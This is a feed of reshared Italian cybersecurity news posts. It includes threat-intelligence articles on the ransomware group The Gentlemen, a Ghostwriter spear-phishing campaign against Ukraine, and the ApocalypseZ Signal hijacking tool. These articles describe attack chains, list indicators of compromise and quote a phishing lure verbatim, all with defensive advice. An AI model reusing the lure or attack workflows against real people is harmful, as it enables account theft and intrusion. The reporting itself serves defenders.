Cybersecurity & cyberwarfare ha ricondiviso questo.

MiniPlasma: la patch del 2020 su Windows che non c’è mai stata o è sparita


@Informatica (Italy e non Italy)
Una vulnerabilità Windows corretta nel 2020 potrebbe non essere mai stata davvero risolta. Con MiniPlasma, il ricercatore Chaotic Eclipse dimostra che il vecchio PoC di Google Project Zero funziona ancora su sistemi Windows 11 aggiornati. Il caso evidenzia i

Cybersecurity & cyberwarfare ha ricondiviso questo.

Parallelamente, la nuova regolazione #UE sulle #VPN rischia di limitare #privacy e sicurezza online, mentre iniziative come i 1,2 milioni di euro a #KDE puntano a rafforzare sicurezza e infrastrutture di #Linux #Plasma, simbolo di un’alternativa più libera e aperta.

(2/2)

@informatica

bit.ly/4tKkJbY

Cybersecurity & cyberwarfare ha ricondiviso questo.

Fuga da #BigTech: sempre più persone cercano di uscire dalle grandi piattaforme per costruire un #web più decentralizzato e controllato dagli utenti. Kauffman e l’#IA mostrano come l’intelligenza artificiale stia dividendo il capitalismo in due sistemi, uno dominato dalle grandi aziende tech e l’altro ancora in costruzione.

(1/2)

@informatica

bit.ly/4tKkJbY

Cybersecurity & cyberwarfare ha ricondiviso questo.

DeepSeek e Huawei sfidano Nvidia: così la Cina prepara l’autosufficienza nell’intelligenza artificiale

Per vedere altri post come questo, segui la comunità @Informatica (Italy e non Italy)

Il nuovo modello di DeepSeek ottimizzato per i semiconduttori di Huawei rafforza la strategia cinese di sganciamento tecnologico dagli Stati Uniti. L'articolo

Cybersecurity & cyberwarfare ha ricondiviso questo.

Taiwan è la chiave per il dominio dell’AI. Report Wsj

Per vedere altri post come questo, segui la comunità @Informatica (Italy e non Italy)

Come e perché Taiwan è diventata il centro fisico della filiera produttiva dell’intelligenza artificiale. L'approfondimento del Wall Street Journal tratto dalla rassegnahttps://www.startmag.it/innovazione/taiwan-e-la-chiave-per-il-dominio-dellai-report-wsj/

Cybersecurity & cyberwarfare ha ricondiviso questo.

L’adozione dell’IA da parte di Meta sta rendendo infelici i suoi dipendenti. Report Nyt

Per vedere altri post come questo, segui la comunità @Informatica (Italy e non Italy)

Meta sta introducendo sistemi di monitoraggio del lavoro dei dipendenti per addestrare i propri modelli di intelligenza artificiale mentre accelera la trasformazione aziendale verso l’IA tra

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please log in.

The Gentlemen smascherati: quando il secondo gruppo ransomware al mondo diventa la vittima


@Informatica (Italy e non Italy)
Il backend del gruppo ransomware-as-a-service The Gentlemen è stato violato e i dati interni pubblicati. Check Point Research ha analizzato il leak, rivelando struttura organizzativa, identità dell'amministratore, tattiche di


The Gentlemen smascherati: quando il secondo gruppo ransomware al mondo diventa la vittima


C’è una certa ironia nel vedere un gruppo ransomware diventare esso stesso vittima di una violazione dei dati. Il 4 maggio 2026, gli operatori di The Gentlemen — il secondo gruppo ransomware più attivo al mondo nel 2026 con oltre 400 vittime pubbliche — hanno dovuto ammettere sui forum underground che il loro database backend era stato compromesso. Check Point Research ha ottenuto una porzione di quei dati prima che venissero rimossi, producendo uno dei dossier più dettagliati mai pubblicati sull’anatomia interna di un’organizzazione RaaS moderna.

L’ascesa fulminante di un gruppo che usava l’AI per sviluppare ransomware


The Gentlemen è emerso nel panorama del cybercrime organizzato con una velocità insolita. Nei soli primi mesi del 2026 ha rivendicato oltre 240 attacchi, raggiungendo il secondo posto globale per numero di vittime secondo il Q1 2026 Ransomware Report di Check Point Research. Una crescita che non è casuale: gli analisti hanno documentato l’uso sistematico di assistenti AI per accelerare lo sviluppo del ransomware, riducendo drasticamente i tempi tra ideazione e deployment dei payload.

Il modello operativo è quello classico del Ransomware-as-a-Service: un nucleo di operatori gestisce la piattaforma, la crittografia, la negoziazione e l’infrastruttura, mentre affiliati terzi si occupano dell’accesso iniziale e del deploy nei sistemi delle vittime. Ciò che distingue The Gentlemen è la sofisticazione organizzativa e la velocità con cui ha scalato le operazioni.

La violazione: come un provider di hosting ha esposto tutto


La compromissione è stata possibile attraverso il provider di hosting 4VPS, utilizzato dal gruppo per gestire parti della propria infrastruttura backend. Una scelta operativa che si è rivelata fatale: quando 4VPS è stato compromesso, con esso è caduta anche la protezione dei database di The Gentlemen. L’annuncio è arrivato dai criminali stessi sui forum underground il 4 maggio 2026 — una mossa inusuale che testimonia quanto grave fosse la situazione.

Check Point Research è riuscita a recuperare una porzione significativa del database prima della rimozione. Il materiale ottenuto include chat interne tra operatori, roster organizzativi, trascrizioni di negoziazioni con le vittime, discussioni sugli strumenti e documentazione sulle infrastrutture utilizzate. Un tesoro informativo che i ricercatori hanno condiviso con le forze dell’ordine, con un’indagine in corso.

Anatomia di una gang: l’organigramma esposto


Il leak ha rivelato che il gruppo è gestito da circa nove operatori nominati, organizzati attorno a un singolo amministratore identificato con gli alias zeta88 e hastalamuerte. Questo profilo non è quello di un principiante: si tratta di un ex affiliato del programma ransomware Qilin, che ha imparato il mestiere sotto un’organizzazione consolidata prima di costruire una struttura concorrente. Una progressione di carriera nel crimine organizzato digitale che rispecchia schemi già visti con altre gang.

L’amministratore non si limita alla gestione della piattaforma, ma partecipa personalmente agli eventi di cifratura — un livello di coinvolgimento diretto insolito per gruppi di questa dimensione, dove solitamente il livello apicale delega completamente le operazioni tattiche agli affiliati. I log di chat mostrano un’organizzazione gerarchica con ruoli definiti: chi gestisce le trattative, chi monitora l’infrastruttura C2, chi coordina gli affiliati.

L’arsenale tecnico: SystemBC, GPO deployment e supply chain pivot


Dal punto di vista tecnico, il report di Check Point descrive una catena di attacco matura. Il punto di ingresso osservato in almeno un incident response tracciato è un Domain Controller già compromesso con privilegi Domain Admin. Da questa posizione, gli attaccanti eseguono una ricognizione sistematica della rete, utilizzando strumenti open-source come gogo per lo scanning automatizzato, validano le credenziali su tutti i sistemi raggiungibili e preparano il terreno per il deploy del payload.

Lo strumento chiave per la fase di persistenza e tunneling è SystemBC, un proxy malware che stabilisce tunnel SOCKS5 cifrati (RC4) verso il server C2 e consente il download e l’esecuzione di payload aggiuntivi, sia su disco che iniettati direttamente in memoria. Un C2 server SystemBC analizzato da Check Point ha rivelato un botnet di oltre 1.570 vittime, con un profilo di infezione orientato prevalentemente verso ambienti corporate.

Il deployment finale del ransomware avviene tramite Group Policy Object (GPO): il binario viene configurato per eseguirsi su tutti i sistemi domain-joined durante il refresh delle policy, producendo un evento di cifratura quasi simultaneo sull’intero dominio — massimizzando il danno e minimizzando la finestra di risposta per i difensori.

Particolarmente rilevante è un attacco documentato nell’aprile 2026 contro una software consultancy britannica: dopo aver violato questa azienda, The Gentlemen ha utilizzato i dati rubati — documentazione infrastrutturale, credenziali, informazioni sugli accessi dei clienti — per condurre un attacco successivo contro uno dei clienti della consultancy in Turchia. Un caso concreto di supply chain pivot che dimostra come il valore di un’intrusione non si misuri solo nei dati esfiltrati, ma nei vettori di attacco secondari che abilita.

Due righe per i difensori: cosa fare dopo questa disclosure


La violazione di The Gentlemen è un evento raro ma istruttivo. Il leak rivela tattiche, procedure e persino identità che possono supportare attività di threat intelligence proattiva. Alcuni elementi pratici: monitorare le connessioni SOCKS5 non autorizzate verso IP esterni; implementare alert su modifiche ai GPO che includono eseguibili non firmati; verificare l’integrità dei Domain Controller come primo indicatore di compromissione avanzata; e applicare il principio del minimo privilegio per limitare il blast radius nel caso di compromise di un affiliato o fornitore.

Check Point ha rilasciato regole YARA per il rilevamento basato su firma del ransomware di The Gentlemen. Per i team SOC, l’integrazione di questi indicatori nelle piattaforme SIEM/SOAR è raccomandata con priorità alta, data la velocità con cui il gruppo ha dimostrato di scalare le operazioni.

Indicatori di Compromissione (IoC)

# The Gentlemen Ransomware - IoC e TTPs
# Fonte: Check Point Research (maggio 2026)
## Tecniche MITRE ATT&CK
T1078 - Valid Accounts (credenziali rubate per lateral movement)
T1021.002 - Remote Services: SMB/Windows Admin Shares
T1484.001 - Group Policy Modification (GPO-based ransomware deployment)
T1090.001 - Proxy: Internal Proxy (SystemBC SOCKS5 tunneling)
T1486 - Data Encrypted for Impact
T1005 - Data from Local System
T1059 - Command and Scripting Interpreter
## SystemBC C2 Communication
Protocollo C2: custom RC4-encrypted SOCKS5
Botnet noto: 1.570+ vittime identificate da singolo C2 server
Caratteristica: payload iniettati in-memory per evasione AV
## Indicatori comportamentali
- Presenza di gogo scanner eseguito da account privilegiati
- Modifiche a GPO esistenti o creazione di nuovi GPO con executables
- Connessioni SOCKS5 in uscita da workstation non-server
- Autenticazioni a cascata originate da Domain Controller
  (pattern: failed auth → successful auth su multipli host)
## Operatore
Alias noti: zeta88, hastalamuerte
Background: ex affiliato Qilin ransomware
Infrastruttura: 4VPS hosting provider (compromesso maggio 2026)
## Nota
# YARA rules disponibili presso Check Point Research:
# https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please log in.

Ghostwriter colpisce il governo ucraino con PDF georeferenziati, PicassoLoader e Cobalt Strike


@Informatica (Italy e non Italy)
Il gruppo bielorusso Ghostwriter (FrostyNeighbor) ha lanciato una nuova campagna di spear-phishing contro enti governativi e militari ucraini, utilizzando PDF-esca che impersonano Ukrtelecom con geofencing per eludere il


Ghostwriter colpisce il governo ucraino con PDF georeferenziati, PicassoLoader e Cobalt Strike


A meno di ventiquattr’ore dalla pubblicazione del report ESET, emerge l’ennesima prova che il conflitto russo-ucraino si combatte su due fronti: quello fisico e quello cibernetico. Il gruppo Ghostwriter — noto anche come FrostyNeighbor, UNC1151, Storm-0257 e White Lynx — ha intensificato le proprie operazioni contro le istituzioni di Kiev, adottando una catena d’attacco sempre più sofisticata che combina phishing mirato, geofencing intelligente e payload a più stadi. La notizia, pubblicata il 14 maggio 2026 da The Hacker News sulla base della ricerca ESET, arriva mentre le operazioni cinetiche nel conflitto rimangono attive.

Chi è Ghostwriter / FrostyNeighbor


Ghostwriter è un APT attivo almeno dal 2016, ritenuto allineato con i servizi d’intelligence bielorussi. Nel corso degli anni ha condotto sia operazioni di cyberspionaggio che campagne di influenza — disinformazione, hack-and-leak, manipolazione di contenuti — contro Ucraina, Polonia, Lituania ed Estonia. ESET lo traccia con il moniker FrostyNeighbor; altri vendor lo conoscono come PUSHCHA, TA445, UAC-0057 o Umbral Bison. Il gruppo ha dimostrato una notevole capacità di adattamento: ogni campagna aggiorna strumenti e metodi di consegna per sfuggire ai sistemi di detection.

La nuova catena d’attacco: geofencing e PDF-esca


Le attività osservate da marzo 2026 evidenziano un salto qualitativo rispetto alle campagne precedenti. Il vettore iniziale è uno spear-phishing con allegato PDF che impersona la società di telecomunicazioni ucraina Ukrtelecom — un mittente di apparente legittimità per qualsiasi funzionario governativo di Kiev.

La caratteristica tecnica più rilevante è il geofencing lato server: quando il destinatario apre il PDF e clicca sul link incorporato, il server degli attaccanti verifica l’indirizzo IP del richiedente. Se l’IP non corrisponde a una geolocalizzazione ucraina, il server restituisce un documento PDF benigno e inoffensivo. Questa tecnica rende l’analisi in sandbox — tipicamente eseguita da infrastrutture cloud non ucraine — completamente inefficace, poiché l’analista riceverà sempre il file pulito.

Catena d’infezione a tre stadi


Per le vittime che superano il controllo geografico, il link nel PDF scarica un archivio RAR contenente un payload JavaScript. L’esecuzione di questo script avviene in parallelo su due binari:

  • Visualizzazione del documento-esca: viene aperto un file lure convincente per mantenere la credibilità dell’allegato originale.
  • Lancio di PicassoLoader: il downloader JavaScript viene eseguito in background, avviando il secondo stadio dell’attacco.

PicassoLoader, già noto dall’arsenale di Ghostwriter, svolge una funzione cruciale di fingerprinting e profilazione dell’host: raccoglie informazioni sul sistema (hostname, utente, sistema operativo, processi attivi, configurazione di rete) e le trasmette all’infrastruttura C2 degli attaccanti ogni 10 minuti. Questa telemetria consente agli operatori di valutare manualmente se la vittima è di interesse strategico.

Solo in caso di risposta affermativa da parte degli operatori, viene inviato un terzo stadio: un dropper JavaScript che installa il Cobalt Strike Beacon — il framework di post-exploitation preferito dagli APT di ogni nazionalità, qui usato per stabilire accesso persistente, esfiltrare dati e muoversi lateralmente nella rete della vittima.

Targeting selettivo: militare, difesa, governo


Secondo ESET, il targeting principale si concentra su organizzazioni militari, del settore difesa e governative in Ucraina. In Polonia e Lituania la campagna mostra un profilo vittimologico più ampio, includendo anche manifatturiero, healthcare, logistica e governo. Questa distinzione suggerisce che in Ucraina le operazioni abbiano un obiettivo di intelligence preciso — raccolta di informazioni militari e governative strategiche — mentre altrove Ghostwriter opera con una rete più larga, probabilmente per mantenere accesso a lungo termine in ottica NATO.

Il contesto più ampio: Gamaredon e BO Team


Le rivelazioni su FrostyNeighbor si inseriscono in un panorama di operazioni cyber parallele nel teatro ucraino. Contestualmente, il gruppo russo Gamaredon — attivo con campagne di spear-phishing contro istituzioni statali ucraine dal settembre 2025 — sta distribuendo GammaDrop e GammaLoad tramite archivi RAR che sfruttano la vulnerabilità CVE-2025-8088. HarfangLab descrive Gamaredon come un attore non sofisticato ma straordinariamente persistente, con un tempo operativo e una scala d’attacco difficilmente eguagliabili.

Sul fronte opposto, il gruppo filoukraino BO Team (alias Black Owl) starebbe collaborando con Head Mare (PhantomCore) in attacchi contro organizzazioni russe, impiegando backdoor come BrockenDoor, ZeronetKit e il nuovo ZeroSSH — un backdoor Go-based capace di stabilire canali SSH inversi e di compromettere anche sistemi Linux.

Indicatori di Compromissione

# Tattiche, Tecniche e Procedure (TTPs) - Ghostwriter / FrostyNeighbor (Marzo 2026)
## Vettore iniziale
- Spear-phishing con allegato PDF
- Lure document: impersonificazione Ukrtelecom
## Tecniche di evasione
- Geofencing IP lato server (solo IP ucraini ricevono payload malevolo)
- Anti-sandbox tramite user-agent check lato server
## Payload chain
1. PDF → link → server geofenzato
2. Archivio RAR → payload JavaScript
3. JavaScript → PicassoLoader (JavaScript variant)
4. PicassoLoader → fingerprint host (ogni 10 min → C2)
5. [Operatore approva] → JavaScript dropper → Cobalt Strike Beacon
## Malware families
- PicassoLoader (JavaScript variant, nuova versione 2026)
- Cobalt Strike Beacon
## Targeting primario
- Organizzazioni militari ucraine
- Settore difesa ucraino  
- Enti governativi ucraini
- Target secondari: Polonia, Lituania (industria, healthcare, logistica)
## Riferimenti
- ESET Research: FrostyNeighbor report, maggio 2026
- Tracking alias: UNC1151, Storm-0257, TA445, UAC-0057, PUSHCHA, White Lynx, Umbral Bison

Due righe per i difensori


La sofisticazione del geofencing rende inutili molte tecniche di sandboxing tradizionale. I team di difesa ucraini e dei paesi NATO nel mirino dovrebbero adottare le seguenti contromisure. Innanzitutto, simulare il download dei link presenti in PDF sospetti utilizzando proxy IP con geolocalizzazione ucraina, in modo da bypassare il filtro geografico e ottenere il payload reale. In secondo luogo, monitorare le connessioni HTTP/HTTPS in uscita ogni 10 minuti verso IP non noti, potenziale segnale di PicassoLoader in fase di beaconing. In terzo luogo, applicare una politica zero-trust sull’esecuzione di JavaScript tramite applicazioni utente: la catena d’infezione si basa interamente su JS. Infine, formare il personale governativo e militare a riconoscere le impersonificazioni di fornitori di servizi (come Ukrtelecom) come vettore di phishing ad alta credibilità.

Il report ESET sintetizza efficacemente la sfida: “FrostyNeighbor rimane un threat actor persistente e adattivo, con un elevato livello di maturità operativa. Il payload viene consegnato solo dopo una validazione lato server che combina controlli automatizzati con la validazione manuale degli operatori”. Una minaccia ibrida — tecnologica e umana — che richiede una risposta altrettanto ibrida.


Cybersecurity & cyberwarfare ha ricondiviso questo.

Xi, Trump e l’inevitabile ritorno di Musk

Per vedere altri post come questo, segui la comunità @Informatica (Italy e non Italy)

Le vere connotazioni del vertice Xi-Trump, i rapporti commerciali tra Cina e Usa, il ruolo di Elon Musk e non solo. Il commento di Aresu

startmag.it/innovazione/elon-m…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Gli Stati Uniti ordinano ai passeggeri dell'Air Force One di buttare via regali, spille e telefoni usa e getta dopo un viaggio in Cina.

Prima di salire a bordo dell'Air Force One, i membri dello staff della Casa Bianca e i giornalisti hanno dovuto consegnare diversi oggetti raccolti durante il viaggio, tra cui telefoni usa e getta, tesserini di accreditamento e spille da bavero rilasciate dalla Cina. Secondo un giornalista del pool stampa della Casa Bianca, coloro che viaggiavano sull'Air Force One hanno gettato questi oggetti in un cestino in fondo alla scaletta dell'aereo.

L'articolo di @Lorenzo Franceschi-Bicchierai su #techcrunch

techcrunch.com/2026/05/15/us-o…

@Informatica (Italy e non Italy)


NEW: The U.S. government ordered people who traveled to the China summit to throw all objects from the trip into a bin before boarding Air Force One.

The items thrown away included gifts, pins, and burner phones.

techcrunch.com/2026/05/15/us-o…


Cybersecurity & cyberwarfare ha ricondiviso questo.

Mythos trova bug persino in Apple: una sveglia per tutte le aziende


@Informatica (Italy e non Italy)
Calif, con Claude Mythos Preview, ha scoperto un exploit su MacOS 26.4.1 su chip M5. Si conferma che con l'AI è urgente un cambio di passo nella cybersecurity
L'articolo Mythos trova bug persino in Apple: una sveglia per tutte le aziende proviene da Cyber Security 360.

Cybersecurity & cyberwarfare ha ricondiviso questo.

Il vertice di Pechino e l’inevitabile ritorno di Musk

Per vedere altri post come questo, segui la comunità @Informatica (Italy e non Italy)

Le vere connotazioni del vertice Xi-Trump, i rapporti commerciali tra Cina e Usa, il ruolo di Elon Musk e non solo. Il commento di Aresu

startmag.it/innovazione/elon-m…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Cyber Journey 2026: servono formazione, confronto e visione per una sicurezza efficace


@Informatica (Italy e non Italy)
A Cagliari si svolgerà il Cyber Journey 2026 dove hanno già confermato la presenza speaker di calibro internazionale. Ecco le tre direttrici che guidano l’edizione di quest'anno
L'articolo Cyber Journey 2026: servono formazione, confronto

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please log in.

ApocalypseZ: come gli hacker russi automatizzano il furto di account Signal su scala industriale


@Informatica (Italy e non Italy)
Un ricercatore di sicurezza di Amnesty International ha scoperto di essere tra i 13.500 bersagli di una campagna russa che utilizza lo strumento ApocalypseZ per dirottare account Signal tramite social engineering.


ApocalypseZ: come gli hacker russi automatizzano il furto di account Signal su scala industriale


Si parla di:
Toggle

Il 14 maggio 2026 TechCrunch ha pubblicato una storia che ha del cinematografico: un ricercatore specializzato nell’investigare attacchi spyware diventa lui stesso bersaglio di hacker governativi russi, ma invece di soccombere trasforma l’attacco in un’indagine che porta alla scoperta di un’infrastruttura di spionaggio capace di prendere di mira oltre 13.500 persone. La storia di Donncha Ó Cearbhaill, responsabile del Security Lab di Amnesty International, è la dimostrazione pratica di come lo spionaggio digitale di Stato oggi lavori in modo industrializzato, automatizzato e scalabile.

Il messaggio che non inganna (ma quasi)


Tutto è iniziato con un messaggio sul suo account Signal: “Dear User, this is Signal Security Support ChatBot. We have noticed suspicious activity on your device, which could have led to data leak. We have also detected attempts to gain access to your private data in Signal. To prevent this, you have to pass verification procedure, entering the verification code to Signal Security Support Chatbot. DON’T TELL ANYONE THE CODE, NOT EVEN SIGNAL EMPLOYEES.”

Il messaggio è grossolano per un esperto di sicurezza — nessuna piattaforma legittima chiede mai codici di verifica via chat — ma per un utente ordinario è sufficientemente convincente. La minaccia di una violazione imminente, il tono urgente, la richiesta di non condividere il codice: tutti elementi classici di ingegneria sociale progettati per innescare una risposta emotiva prima che quella razionale possa intervenire.

Il meccanismo tecnico: device linking via codice OTP


L’obiettivo dell’attacco non è rubare la password (Signal non ha password tradizionali), ma sfruttare la funzionalità legittima di linked devices di Signal. Quando si collega un nuovo dispositivo a un account Signal esistente, l’app genera un QR code o un codice numerico. Se l’utente viene ingannato a condividere questo codice con gli attaccanti, questi possono aggiungere un dispositivo controllato da loro come “dispositivo secondario” dell’account — ottenendo così accesso a tutti i messaggi futuri e a quelli precedenti sincronizzati.

La tecnica non richiede zero-day, exploit sofisticati o accesso fisico al dispositivo: bastano ingegneria sociale e un utente che si fida abbastanza da inserire un codice. Ó Cearbhaill, riconoscendo immediatamente la natura del tentativo, ha deciso di non bloccare l’interazione ma di utilizzarla come punto d’ingresso per investigare la campagna.

ApocalypseZ: la piattaforma di attacco di Stato


La scoperta più significativa dell’indagine è lo strumento che gli attaccanti utilizzano: ApocalypseZ. Si tratta di una piattaforma di automazione degli attacchi che consente agli operatori di prendere di mira molte persone simultaneamente con supervisione umana minima. Il codebase e l’interfaccia operativa sono in russo, e lo strumento include funzionalità di traduzione automatica dei messaggi delle vittime in russo — elemento che allinea l’attribuzione ai servizi intelligence russi confermata da CISA, NCSC britannico e intelligence olandese.

La logica operativa di ApocalypseZ funziona come un “funnel” automatizzato: il sistema invia messaggi di phishing in bulk, traccia le risposte, e quando una vittima interagisce attivamente, allerta un operatore umano per gestire la fase di convincimento finale. Questo approccio semi-automatizzato consente di scalare la campagna a decine di migliaia di bersagli mantenendo l’efficacia del social engineering.

La “snowball hypothesis”: come si espande il targeting


Ó Cearbhaill ha identificato un pattern importante nel modo in cui gli attaccanti selezionano i propri bersagli. Egli chiama questo meccanismo la “snowball hypothesis”: quando gli hacker compromettono con successo un account Signal, ottengono accesso alla lista dei contatti e alle chat di gruppo di quella persona. Questo fornisce una lista pronta di nuovi potenziali bersagli — colleghi, giornalisti, attivisti, fonti — che vengono aggiunti automaticamente alla coda di attacco.

Il ricercatore ritiene di essere diventato un bersaglio perché era membro di una chat di gruppo con qualcuno che era già stato compromesso. Tra i target identificati figurano giornalisti con cui aveva lavorato e un collega diretto — confermando che il network di contatti delle vittime è il principale meccanismo di espansione della campagna.

Scala e attribuzione: 13.500 bersagli e CISA


Analizzando l’infrastruttura di ApocalypseZ, Ó Cearbhaill ha determinato di essere tra almeno 13.500 bersagli identificati — e lui stesso precisa che il numero reale è certamente molto più alto, poiché la campagna era ancora attiva al momento della pubblicazione del suo report. Tra le vittime confermate vi sarebbero anche politici di alto profilo tedeschi, come riportato da Der Spiegel.

L’attribuzione a hacker governativi russi è stata formalizzata da più agenzie: la CISA statunitense, il NCSC britannico e i servizi d’intelligence olandesi hanno tutti emesso avvisi pubblici su questa campagna. Il targeting include giornalisti, ricercatori di sicurezza, funzionari governativi, attivisti e personale delle ONG — il tipico profilo di interesse dei servizi d’intelligence russi (FSB/GRU/SVR).

Il contesto: una campagna di lunga durata contro le app di messaggistica sicura


Questo attacco non è isolato. Da inizio 2026, Signal ha emesso avvisi pubblici su campagne di phishing contro i propri utenti. L’intelligence olandese aveva già messo in guardia a marzo 2026 contro hacker russi che prendono di mira Signal e WhatsApp. Il pattern è chiaro: man mano che la crittografia end-to-end è diventata lo standard per le comunicazioni sensibili, i servizi d’intelligence hanno spostato i propri sforzi dall’intercettazione delle comunicazioni al compromissione degli endpoint — cioè del dispositivo o dell’account dell’utente.

Signal stesso, nella sua architettura, è resistente agli attacchi a livello di rete. Ma nessuna crittografia può proteggere da un utente che viene convinto a consegnare volontariamente l’accesso al proprio account.

Indicatori e vettori di attacco

# Campagna phishing Signal - APT russo (ApocalypseZ)
# Rilevata: inizio 2026 | Pubblicata: 14 maggio 2026

## Vettore di attacco
- Piattaforma: Signal (messaggistica diretta)
- Metodo: impersonificazione "Signal Security Support ChatBot"
- Obiettivo: ottenere codice OTP per device linking
- Automazione: strumento ApocalypseZ (codebase in russo)

## Tecnica (MITRE ATT&CK)
- T1566 - Phishing
- T1078 - Valid Accounts (device linking tramite codice OTP legittimo)
- T1119 - Automated Collection (scraping lista contatti post-compromissione)

## Targeting
- 13.500+ bersagli identificati (numero reale superiore)
- Profili: giornalisti, ricercatori sicurezza, funzionari gov, attivisti, ONG
- Nazioni: USA, UK, Germania, Paesi Bassi, altri paesi NATO/UE

## Attribuzione
- CISA (USA): hacker governativi russi
- NCSC (UK): campagna attribuita a spie russe
- AIVD (NL): servizi intelligence russi

## Indicatori comportamentali (social engineering)
- Messaggio urgente da "Signal Security Support"
- Richiesta codice OTP/verifica
- Istruzione "non condividere il codice"
- Pressione temporale per completare verifica

## Difesa specifica
- Abilitare Registration Lock in Signal (Impostazioni > Account > PIN)
- Non condividere MAI codici OTP ricevuti su Signal
- Verificare dispositivi collegati: Impostazioni > Dispositivi collegati

Due righe per i difensori


La difesa contro questo tipo di attacco è paradossalmente semplice rispetto alla sofisticazione dell’infrastruttura offensiva. Ó Cearbhaill raccomanda di attivare immediatamente la funzione Registration Lock di Signal (nelle impostazioni come PIN di blocco registrazione): questa feature impedisce che il proprio numero di telefono venga registrato su un nuovo dispositivo senza conoscere il PIN, vanificando il device linking non autorizzato anche se l’attaccante ottiene il codice OTP.

Più in generale, per le organizzazioni che gestiscono profili ad alto rischio — giornalisti investigativi, difensori dei diritti umani, ricercatori di sicurezza, funzionari governativi — è fondamentale adottare un approccio sistematico alla sicurezza delle comunicazioni: audit periodico dei dispositivi collegati a ogni account, formazione sul riconoscimento del social engineering su piattaforme di messaggistica, e protocolli di verifica out-of-band quando si ricevono richieste inusuali anche da fonti apparentemente note.

La storia di Ó Cearbhaill termina con una nota di sfida aperta: il ricercatore ha dichiarato di dubitare che gli attaccanti proveranno a colpirlo di nuovo, e di dare il benvenuto a futuri messaggi — specialmente se contenessero zero-day da condividere. Un invito ironico che sintetizza l’essenza del lavoro di chi studia lo spionaggio digitale: trasformare ogni attacco in conoscenza.


Cybersecurity & cyberwarfare ha ricondiviso questo.

Asml, i Paesi Bassi sbuffano contro gli Stati Uniti per la nuova legge anti-Cina

Per vedere altri post come questo, segui la comunità @Informatica (Italy e non Italy)

I Paesi Bassi sono contrari al Match Act degli Stati Uniti, una legge che inasprisce le restrizioni alla vendita di macchinari per i microchip in Cina e che, di conseguenza, danneggerebbe gli affari del colosso Asml. Tutti i dettagli.

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

La Cina ha avviato la produzione delle proprie macchine con tecnologia DUV da 7 nm

📌 Link all'articolo : redhotcyber.com/post/la-cina-h…

Carolina Vivianti

#redhotcyber #cybersecurity #cybercrime #hacking #cti #ai #privacy #news #technology

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

Hackers are exploiting a CVSS 10 RCE in Arista VeloCloud Orchestrator on-prem servers

arista.com/en/support/advisori…

cisa.gov/news-events/alerts/20…

reshared this

FreeBSD Just Removed the Last of its GPL-Licensed Code


The media in this post is not displayed to visitors. To view it, please log in.

With a recent change that removed dialog in favor of bsddialog, FreeBSD has now retired the last piece of GPL-licensed code in its base system. Although the impact of this change will be minor for users, it does highlight once again the Open Source divide that has split developers since the 1990s, when [Linus Torvalds] attached a scribbled set of notes to the v0.01 Linux kernel release that would later be replaced with the very similar GPL license and its derivatives.

This history and its impacts are also the subject of a recent video by [Brodie Robertson]. For the FreeBSD project the biggest change here is probably that the entire GNU subtree in the codebase is now gone, As detailed in the video, this is the end of a very long-running project, whereby FreeBSD in its early days incorporated GNU code for userland tools. These components and its replacements are detailed in the FreeBSD wiki.

Naturally, this change has upset some people for reasons best known to themselves, but from a project management perspective this makes a lot of sense. Not having BSD-incompatible licenses like GPL in your source code massively simplifies matters. The main difference being that the GPL is reciprocal, requiring that derivative works also be released under the GPL — a feature that is often at odds with commercial projects. Meanwhile, the BSD licenses merely require the use of BSD-licensed code to be declared.

The upshot of the BSD-license in the case of FreeBSD is that it has found it and its components used in many commercial products, including MacOS/OS X, the PlayStation’s Orbis OS, and of course the BSD networking stack is happily used in Windows, macOS and just about anywhere else. Meanwhile the GPL forced Linksys to open the firmware to its WRT54G series of routers, ultimately leading to the development of OpenWrt and similar projects.

Although the OSS licensing flamewars will likely never end, it’s hard to disagree that FreeBSD is pretty healthy at over thirty years old, even if using it as a desktop OS comes with a few asterisks.

youtube.com/embed/jmWq0gMx20o?…


hackaday.com/2026/07/28/freebs…

Cybersecurity & cyberwarfare ha ricondiviso questo.

#JetBrains Patches Critical #TeamCity Flaw Allowing Server Takeover
securityaffairs.com/196169/sec…
#securityaffairs #hacking
Cybersecurity & cyberwarfare ha ricondiviso questo.

#nerdystuff in pausa pranzo

#JustTheRecipe ripulisce qualsiasi pagina di ricetta dal romanzo di vita dell'autrice, dai popup e dagli otto scroll di pubblicità, lasciandoti solo ingredienti e procedimento.

🍝 justtherecipe.com

Cybersecurity & cyberwarfare ha ricondiviso questo.

Il vero rischio dell'IA si annida all'interno dei laboratori. Un nuovo e interessante post di Salvatore Sanfilippo aka @antirez


Credo che non dovremmo considerare l'IA sicura.
Un evento critico che potrebbe portare all'estinzione dell'Homo sapiens è possibile, ma il pericolo non risiede nei modelli aperti o nel fatto che la Cina stia facendo progressi più rapidi degli Stati Uniti. Il pericolo è che alcuni CEO (in tutto il mondo), privi delle competenze e della legittimità necessarie, si trovino nella posizione di dover prendere decisioni difficili per l'intera umanità. Non sono stati scelti per farlo; è stata solo la casualità degli eventi a creare questa situazione. Non possono parlare a nome di tutti, viste le poste in gioco, solo perché dispongono di GPU e denaro. Questo è il primo problema da risolvere.


antirez.com/news/172

@aitech

Cybersecurity & cyberwarfare ha ricondiviso questo.

New Crypter-as-a-Service #Cruciferra Fuels Stealthy Malware Attacks Worldwide
securityaffairs.com/196151/mal…
#securityaffairs #hacking
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Microsoft lancia Perception: la sua IA agentica contro gli hacker criminali. Ma il cloud è sempre dietro la porta

📌 Link all'articolo : redhotcyber.com/post/microsoft…

Carolina Vivianti

#redhotcyber #cybersecurity #cybercrime #hacking #cti #ai #privacy #news #technology

reshared this

Lavoro su piattaforme digitali: il recepimento della direttiva UE mette gli algoritmi sotto controllo


@Informatica (Italy e non Italy)
Lo schema di decreto che recepisce la direttiva UE sul lavoro mediante piattaforme digitali introduce nuove regole su trasparenza algoritmica, supervisione umana e tutela dei dati personali. Ma resta aperta

Cyber security negli ospedali: le linee guida Enisa cambiano le regole degli appalti


